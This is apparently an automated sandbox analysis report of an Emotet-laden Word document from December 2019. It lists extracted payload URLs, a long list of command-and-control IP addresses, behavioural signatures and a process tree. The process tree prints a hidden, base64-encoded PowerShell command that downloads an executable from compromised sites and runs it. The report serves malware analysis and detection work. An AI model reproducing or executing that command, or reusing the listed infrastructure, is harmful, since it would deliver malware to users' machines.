Analysis
-
max time kernel
24s -
resource
win10v191014 -
submitted
24-12-2019 23:22
General
Malware Config
Extracted
https://www.spectaglobal.com/wp-admin/SELFt1969/
http://www.emir-elbahr.com/wp-admin/css/1u8825/
https://www.jwtrubber.com/wp-content/73LYb/
https://adanzyeyapi.com/wp-includes/dD6121/
https://www.smartwebdns.net/_vti_bin/0QRGg70/
Extracted
emotet
177.180.115.224:80
177.242.21.126:80
190.210.236.139:80
144.217.117.207:8080
96.126.121.64:443
104.236.137.72:8080
85.234.143.94:8080
5.88.27.67:8080
37.187.6.63:8080
186.15.83.52:8080
201.213.32.59:80
97.81.12.153:80
178.79.163.131:8080
138.68.106.4:7080
217.199.160.224:8080
181.61.143.177:80
189.19.81.181:443
186.68.48.204:443
118.36.70.245:80
80.11.158.65:8080
68.187.160.28:443
116.48.138.115:80
190.161.180.184:80
200.123.183.137:443
159.203.204.126:8080
85.152.208.146:80
151.237.36.220:80
96.61.113.203:80
191.103.76.34:443
2.139.158.136:443
163.172.40.218:7080
83.248.141.198:80
46.101.212.195:8080
2.44.167.52:80
46.28.111.142:7080
142.93.114.137:8080
181.231.220.232:80
74.59.187.94:80
139.162.118.88:8080
93.67.154.252:443
203.25.159.3:8080
202.62.39.111:80
109.169.86.13:8080
142.127.57.63:8080
5.196.35.138:7080
37.120.185.153:443
96.38.234.10:80
83.165.78.227:80
181.198.203.45:443
2.45.112.134:80
110.170.65.146:80
112.218.134.227:80
190.146.131.105:8080
190.151.5.130:443
190.210.184.138:995
5.32.41.106:80
192.241.146.84:8080
114.109.179.60:80
68.183.190.199:8080
77.27.221.24:443
87.106.77.40:7080
91.74.175.46:80
203.130.0.69:80
91.83.93.124:7080
51.255.165.160:8080
93.148.252.90:80
212.71.237.140:8080
68.183.170.114:8080
58.171.38.26:80
79.7.114.1:80
91.205.215.57:7080
87.106.46.107:8080
14.160.93.230:80
104.131.58.132:8080
113.190.254.245:80
74.79.103.55:80
190.100.153.162:443
37.183.121.32:80
190.195.129.227:8090
190.186.164.23:80
91.204.163.19:8090
185.86.148.222:8080
69.163.33.84:8080
144.139.56.105:80
63.248.198.8:80
149.62.173.247:8080
220.255.57.31:80
62.75.160.178:8080
223.255.148.134:80
73.60.8.210:80
81.157.234.90:8080
72.29.55.174:80
91.191.206.60:443
187.188.166.192:8080
97.120.32.227:80
125.99.61.162:7080
2.42.173.240:80
113.61.76.239:80
185.160.212.3:80
165.228.195.93:80
181.10.204.106:80
45.50.177.164:80
181.36.42.205:443
200.58.83.179:80
111.125.71.22:8080
183.99.239.141:80
91.117.83.59:80
190.97.30.167:990
68.174.15.223:80
212.237.50.61:8080
200.119.11.118:443
77.55.211.77:8080
207.154.204.40:8080
175.114.178.83:443
179.159.198.70:80
212.253.82.142:443
190.6.193.152:8080
130.204.247.253:80
190.74.246.158:8080
219.75.66.103:80
62.75.143.100:7080
45.8.136.201:80
152.170.108.99:443
188.135.15.49:80
50.28.51.143:8080
93.144.226.57:80
86.42.166.147:80
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4840 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE73.exe73.exepid process 4840 WINWORD.EXE 4628 73.exe 3800 73.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4840 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4468 Powershell.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
73.exepid process 3800 73.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4468 4220 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4468 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
Powershell.exe73.exedescription pid process target process PID 4468 wrote to memory of 4628 4468 Powershell.exe 73.exe PID 4628 wrote to memory of 3800 4628 73.exe 73.exe -
Executes dropped EXE 2 IoCs
Processes:
73.exe73.exepid process 4628 73.exe 3800 73.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ecc9db7e20004a8efd97edf7ccfbae92d66f42ca1d99ec8f7ef71e0131a96839.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4840
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABLAGoAeABmAGkAcQBnAGMAZQB6AGcAcAB3AD0AJwBYAHEAYQBtAHoAbwBkAHcAeQAnADsAJABHAHMAdQBpAHMAYQBxAGQAbgBnAHEAIAA9ACAAJwA3ADMAJwA7ACQAVwBoAGwAYwBnAHgAcgB3AGEAawBvAHYAYwA9ACcAQgB0AG8AdAB3AGcAbABnAHcAZwBkACcAOwAkAE4AawB5AGoAeABrAHAAaABqAGkAdQBkAHQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEcAcwB1AGkAcwBhAHEAZABuAGcAcQArACcALgBlAHgAZQAnADsAJABIAG0AegBlAGQAcwBrAHYAdAB3AD0AJwBFAHcAZgBtAGMAZgBrAHAAYQBiAGQAagAnADsAJABHAGoAeQBrAHcAYgBkAHUAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4AZQBUAC4AVwBFAEIAQwBMAEkAZQBuAHQAOwAkAFAAZgBvAHQAbQBkAGoAZABhAGwAYgA9ACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcwBwAGUAYwB0AGEAZwBsAG8AYgBhAGwALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFMARQBMAEYAdAAxADkANgA5AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZQBtAGkAcgAtAGUAbABiAGEAaAByAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBjAHMAcwAvADEAdQA4ADgAMgA1AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBqAHcAdAByAHUAYgBiAGUAcgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADcAMwBMAFkAYgAvACoAaAB0AHQAcABzADoALwAvAGEAZABhAG4AegB5AGUAeQBhAHAAaQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AZABEADYAMQAyADEALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHMAbQBhAHIAdAB3AGUAYgBkAG4AcwAuAG4AZQB0AC8AXwB2AHQAaQBfAGIAaQBuAC8AMABRAFIARwBnADcAMAAvACcALgAiAFMAUABMAGAASQBUACIAKAAnACoAJwApADsAJABSAGwAYQBvAHcAYwBqAGgAcAA9ACcASgBzAGsAegB0AGkAdwBwAGIAcwAnADsAZgBvAHIAZQBhAGMAaAAoACQASwBlAGcAbwBmAGoAcAB0AGoAIABpAG4AIAAkAFAAZgBvAHQAbQBkAGoAZABhAGwAYgApAHsAdAByAHkAewAkAEcAagB5AGsAdwBiAGQAdQAuACIAZABgAE8AdwBgAE4ATABgAE8AQQBkAEYASQBsAEUAIgAoACQASwBlAGcAbwBmAGoAcAB0AGoALAAgACQATgBrAHkAagB4AGsAcABoAGoAaQB1AGQAdAApADsAJABVAHQAYQB0AHkAagBmAGkAcAA9ACcAQQB5AHUAZQBhAHcAaAB3AGgAcQBhAHMAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABOAGsAeQBqAHgAawBwAGgAagBpAHUAZAB0ACkALgAiAEwARQBOAGAAZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA3ADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQByAHQAIgAoACQATgBrAHkAagB4AGsAcABoAGoAaQB1AGQAdAApADsAJABIAHQAZwB1AGcAcABpAGYAZwB2AHYAPQAnAFkAagBmAHYAbwB3AGoAYQB5AGUAJwA7AGIAcgBlAGEAawA7ACQAVAB2AGMAcAB0AGEAbgB1AGkAYgBtAGMAPQAnAEYAcwB0AG4AagBlAG4AdwB5AHgAawAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABRAHAAcQBpAG8AawBiAG0AdQA9ACcATgB1AGkAbwBkAHcAeABkAGEAegBxACcA1⤵
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Users\Admin\73.exe"C:\Users\Admin\73.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4628 -
C:\Users\Admin\73.exe--54dcd4263⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Executes dropped EXE
PID:3800
-
-